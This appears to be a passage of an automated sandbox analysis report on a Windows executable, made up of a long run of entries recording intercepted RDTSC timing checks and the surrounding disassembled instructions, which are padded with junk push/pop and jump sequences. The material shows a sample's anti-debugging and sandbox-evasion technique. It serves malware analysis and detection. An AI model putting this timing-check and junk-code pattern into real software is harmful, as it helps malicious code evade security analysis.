Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 551E39 second address: 551E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8B146C0A06h 0x0000000a popad 0x0000000b jmp 00007F8B146C0A0Fh 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 551E58 second address: 551E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jbe 00007F8B151F0E42h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 551E67 second address: 551E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5567E6 second address: 556800 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E46h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 556800 second address: 55681A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8B146C0A10h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55681A second address: 55681E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55681E second address: 556824 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 556824 second address: 55682A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55682A second address: 55682E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55682E second address: 556832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 556832 second address: 556851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B146C0A10h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jp 00007F8B146C0A06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 556851 second address: 556864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8B151F0E36h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 556864 second address: 556871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F8B146C0A06h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 556871 second address: 556880 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnp 00007F8B151F0E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 555B25 second address: 555B2B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 555B2B second address: 555B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8B151F0E43h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F8B151F0E43h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jmp 00007F8B151F0E44h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 555B72 second address: 555B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 555CD3 second address: 555CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 555E69 second address: 555E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5560E1 second address: 5560E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55639D second address: 5563A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8B146C0A06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5563A7 second address: 5563EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8B151F0E49h 0x0000000f jmp 00007F8B151F0E47h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5563EA second address: 5563F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55C79D second address: 55C7A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55C7A1 second address: 55C7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnp 00007F8B146C0A06h 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55C7AF second address: 55C7B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55C7B5 second address: 55C7D4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8B146C0A06h 0x00000008 ja 00007F8B146C0A06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 jnl 00007F8B146C0A06h 0x00000017 pop edi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55C7D4 second address: 55C7DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55C7DA second address: 55C7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8B146C0A06h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502F3F second address: 502F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5669E5 second address: 5669EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56585F second address: 565879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F8B151F0E3Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 565E21 second address: 565E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 je 00007F8B146C0A13h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F8B146C0A0Bh 0x00000016 jp 00007F8B146C0A0Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5663CC second address: 5663D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5663D2 second address: 5663D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5663D8 second address: 5663DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56AC79 second address: 56AC97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8B146C0A14h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569D9C second address: 569DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569DA0 second address: 569DAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A0Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569DAF second address: 569DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0A2 second address: 56A0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jo 00007F8B146C0A06h 0x0000000c jmp 00007F8B146C0A10h 0x00000011 jg 00007F8B146C0A06h 0x00000017 jmp 00007F8B146C0A19h 0x0000001c popad 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 jmp 00007F8B146C0A18h 0x00000025 pop eax 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0FD second address: 56A105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A105 second address: 56A10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A3D6 second address: 56A3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A3DC second address: 56A3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A7DA second address: 56A7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A7DE second address: 56A7F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A16h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A7F8 second address: 56A802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A802 second address: 56A806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A806 second address: 56A80A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A80A second address: 56A81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jo 00007F8B146C0A06h 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A81B second address: 56A82F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8B151F0E3Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jl 00007F8B151F0E42h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F86D second address: 56F890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8B146C0A0Dh 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F8B146C0A06h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F890 second address: 56F89A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F89A second address: 56F8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F8A0 second address: 56F8C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F8B151F0E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8B151F0E47h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5776AB second address: 5776AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5776AF second address: 5776F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8B151F0E44h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnp 00007F8B151F0E36h 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F8B151F0E49h 0x00000019 jnp 00007F8B151F0E36h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5776F6 second address: 577722 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8B146C0A06h 0x00000008 jmp 00007F8B146C0A0Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F8B146C0A0Ch 0x0000001c jnp 00007F8B146C0A06h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57788C second address: 577898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F8B151F0E36h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577898 second address: 57789E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57789E second address: 5778AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F8B151F0E36h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577B61 second address: 577B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8B146C0A06h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577B6C second address: 577B76 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8B151F0E3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577B76 second address: 577B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jnc 00007F8B146C0A06h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577E4E second address: 577E5E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8B151F0E42h 0x00000008 jns 00007F8B151F0E36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577E5E second address: 577E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5782AE second address: 5782C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E45h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5783F6 second address: 5783FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5783FA second address: 578400 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 578400 second address: 57841E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8B146C0A17h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 578C67 second address: 578C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABAB5 second address: 4ABADB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F8B146C0A06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABADB second address: 4ABADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABADF second address: 4ABB09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A0Fh 0x00000007 je 00007F8B146C0A06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8B146C0A0Dh 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABB09 second address: 4ABB0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABB0D second address: 4ABB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABB1B second address: 4ABB21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57EF06 second address: 57EF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F8B146C0A11h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57EF1E second address: 57EF25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590B0F second address: 590B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590B15 second address: 590B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590B19 second address: 590B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F8B146C0A11h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590B37 second address: 590B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590B3D second address: 590B4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5904EC second address: 5904F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59066D second address: 590671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 592884 second address: 592889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5929D6 second address: 5929DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5929DA second address: 5929F0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8B151F0E36h 0x00000008 jne 00007F8B151F0E36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 599102 second address: 59910D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F8B146C0A06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B91E second address: 59B922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B922 second address: 59B92C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8B146C0A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B92C second address: 59B932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B932 second address: 59B936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B936 second address: 59B93A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B93A second address: 59B955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B146C0A12h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AC622 second address: 5AC63E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F8B151F0E41h 0x0000000c popad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AC63E second address: 5AC651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jbe 00007F8B146C0A06h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB035 second address: 5AB047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 ja 00007F8B151F0E36h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 rdtsc
